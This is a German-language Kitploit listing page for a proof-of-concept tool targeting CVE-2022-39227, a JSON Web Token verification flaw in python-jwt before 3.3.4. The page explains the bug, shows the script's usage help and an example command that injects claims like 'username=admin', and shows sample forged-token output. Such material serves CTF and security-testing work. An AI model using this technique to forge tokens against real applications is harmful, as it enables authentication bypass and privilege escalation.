Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-39227 — CVE-2022-39227 : Proof of Concept | Kitploit
Tools/GitHubGitHub/user0x1337/cve-2022-39227
Payload-GenerierungSchwachstellenanalyseExploitationWebsicherheitCTFAuthentifizierung
GitHubuser0x1337/cve-2022-39227

CVE-2022-39227

CVE-2022-39227 : Proof of Concept

Repository anzeigen
2212vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-39227

CVE-2022-39227 : Proof of Concept

Beweis des Konzepts für die CVE-2022-39227. Laut dieser CVE gibt es einen Fehler in der JSON Web Token Verifikation. Es ist möglich, mit einem gültigen Token dessen Signatur mit modifizierten Claims wiederzuverwenden.

Erforderlich:

  1. Ein gültiges JSON Web Token.
  2. Das Backend muss die Python-Bibliothek "python-jwt" in der Version < 3.3.4 verwenden.

Der Einfachheit halber habe ich während eines CTFs einen einfachen PoC geschrieben:

root@kitploit:~
usage: CVE-2022-39227-PoC [-h] -j TOKEN -i CLAIM

Proof of Concept for the JWT verification bug in python-jwt version < 3.3.4

options:
  -h, --help            show this help message and exit
  -j TOKEN, --jwt_token TOKEN
                        Original and valid JWT Token returned by the application
  -i CLAIM, --injected_claim CLAIM
                        Inject claim using the form "key=value", e.g. "username=admin". Use "," for more claims
                        (e.g. username=admin,id=3)

Verwendung:

python3 cve_2022_39227.py -j <JWT-WEBTOKEN> -i "<KEY>=<VALUE>"

Rückgabe:

root@kitploit:~
{"  <SNIP>":"","protected":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"<SNIP>","signature":"18-caQyY-mnreIUb53kk5qI-axRoxSzQKyT033yOdUw"}

Der Rückgabewert ist eine Mischform aus JSON und kompakter Darstellung. Sie müssen den gesamten Wert einschließlich "{" und "}" als Ihr neues JWT Web Token einfügen.

Tool herunterladen